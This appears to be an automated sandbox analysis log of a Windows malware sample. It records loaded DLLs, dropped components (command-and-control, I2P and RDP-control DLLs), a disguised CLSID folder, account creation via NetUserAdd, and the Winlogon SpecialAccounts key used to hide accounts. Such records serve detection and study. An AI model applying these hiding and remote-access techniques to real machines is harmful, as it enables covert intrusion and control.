Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: apphelp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: ntmarta.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wer.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: iphlpapi.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: winhttp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptbase.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: windows.storage.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wldp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netapi32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: userenv.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: netutils.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samcli.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: mswsock.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: libi2p.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: wsock32.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: cryptsp.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: rsaenh.dll
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeSection loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeFile written: C:\Users\user\AppData\Local\Temp\wfpblk.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: file.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: file.exeStatic file information: File size 11950592 > 1048576
Source: file.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x8b1200
Source: file.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x100200
Source: Binary string: RfxVmt.pdb source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: Binary string: RfxVmt.pdbGCTL source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 0000001D.00000002.2203168945.0000027B43FE4000.00000004.00000020.00020000.00000000.sdmp, T9229YlC.29.dr, update.pkg.18.dr
Source: rfxvmt.dll.29.drStatic PE information: 0xE004CD23 [Sat Feb 5 03:04:03 2089 UTC]
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CEFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,13_2_00007FF7E3CEFF1F
Source: file.exeStatic PE information: section name: .didata
Source: lr75sq5smrngkif9fpn.exe.8.drStatic PE information: section name: .xdata
Source: yhar2he6rpt6n0h1w6rh.exe.8.drStatic PE information: section name: .xdata
Source: main.exe.18.drStatic PE information: section name: .xdata
Source: rdpctl.dll.29.drStatic PE information: section name: .xdata
Source: samctl.dll.29.drStatic PE information: section name: .xdata
Source: prgmgr.dll.29.drStatic PE information: section name: .xdata
Source: dwlmgr.dll.29.drStatic PE information: section name: .xdata
Source: cnccli.dll.29.drStatic PE information: section name: .xdata
Source: libi2p.dll.29.drStatic PE information: section name: .xdata
Source: evtsrv.dll.29.drStatic PE information: section name: .xdata
Source: termsrv32.dll.29.drStatic PE information: section name: .xdata
Source: UEptccWa.29.drStatic PE information: section name: .xdata
Source: nHqxqt5L.29.drStatic PE information: section name: .xdata
Source: fQQIqQM0.29.drStatic PE information: section name: .xdata
Source: x8eec9dQ.29.drStatic PE information: section name: .xdata
Source: miECvZvT.29.drStatic PE information: section name: .xdata
Source: TLbqzKsW.29.drStatic PE information: section name: .xdata
Source: e5xaOqBz.29.drStatic PE information: section name: .xdata
Source: VPIOcgIO.29.drStatic PE information: section name: .xdata
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C120E pushfd ; retf 6_2_032C120F
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032DF262 push es; retf 6_2_032DF263
Source: C:\Users\user\Desktop\file.exeCode function: 6_2_032C6769 push esi; ret 6_2_032C676B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472B8 push rsp; ret 29_2_00007FFB227472B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472BC push rsp; ret 29_2_00007FFB227472BD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472C4 push rsp; ret 29_2_00007FFB227472C5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472CC push rsp; ret 29_2_00007FFB227472CD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472D0 push rsp; ret 29_2_00007FFB227472D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472D4 push rsp; ret 29_2_00007FFB227472D5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472D8 push rsp; ret 29_2_00007FFB227472D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472DC push rsp; ret 29_2_00007FFB227472DD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472E0 push rsp; ret 29_2_00007FFB227472E1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472E4 push rsp; ret 29_2_00007FFB227472E5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227472E8 push rsp; ret 29_2_00007FFB227472E9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2274726F push qword ptr [rsi]; ret 29_2_00007FFB22747275
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2274727C push rsp; ret 29_2_00007FFB2274727D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479B3 push qword ptr [00007FFB58747884h]; retf 29_2_00007FFB227479B9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479BB push qword ptr [00007FFB5874788Ch]; retf 29_2_00007FFB227479C1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479C3 push qword ptr [00007FFB58747894h]; retf 29_2_00007FFB227479C9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479CB push qword ptr [00007FFB5874789Ch]; retf 29_2_00007FFB227479D1
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479D3 push qword ptr [00007FFB587478A4h]; retf 29_2_00007FFB227479D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479E7 push qword ptr [00007FFB587478B8h]; retf 29_2_00007FFB227479ED
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479EF push qword ptr [00007FFB587478C0h]; retf 29_2_00007FFB227479F5
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479F7 push qword ptr [00007FFB587478C8h]; retf 29_2_00007FFB227479FD
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB227479FF push qword ptr [00007FFB587478D0h]; retf 29_2_00007FFB22747A05
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22747A07 push qword ptr [00007FFB587478D8h]; retf 29_2_00007FFB22747A0D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22747A0F push qword ptr [00007FFB587478E0h]; retf 29_2_00007FFB22747A15
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22747A17 push qword ptr [00007FFB297478E8h]; retf 29_2_00007FFB22747A1D
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2270870B strlen,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strlen,NetUserAdd,CreateProfile,29_2_00007FFB2270870B
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\UEptccWaJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\x8eec9dQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\VPIOcgIOJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\e5xaOqBzJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nHqxqt5LJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLbqzKsWJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\T9229YlCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\miECvZvTJump to dropped file
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fQQIqQM0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\UEptccWaJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\x8eec9dQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\VPIOcgIOJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\e5xaOqBzJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nHqxqt5LJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLbqzKsWJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\T9229YlCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\miECvZvTJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fQQIqQM0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\T9229YlCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\UEptccWaJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\nHqxqt5LJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\fQQIqQM0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\x8eec9dQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\miECvZvTJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\TLbqzKsWJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\e5xaOqBzJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeFile created: C:\Windows\Temp\VPIOcgIOJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeFile created: C:\Users\user~1\AppData\Local\Temp\installer.logJump to behavior
Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD1DBC strcmp,strcmp,StartServiceCtrlDispatcherA,_read,GetLastError,29_2_00007FF7AABD1DBC
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\sc.exe sc.exe stop RDP-Controller

Hooking and other Techniques for Hiding and Protection

barindex
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546713788.00007FF70C31E000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListsam_user_test_special_accountsam_user_set_special_account(is_set == 0) || (is_set == 1)SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts[E] (%s) -> Failed(s_sid=%s,is_set=%d,err=%08x)
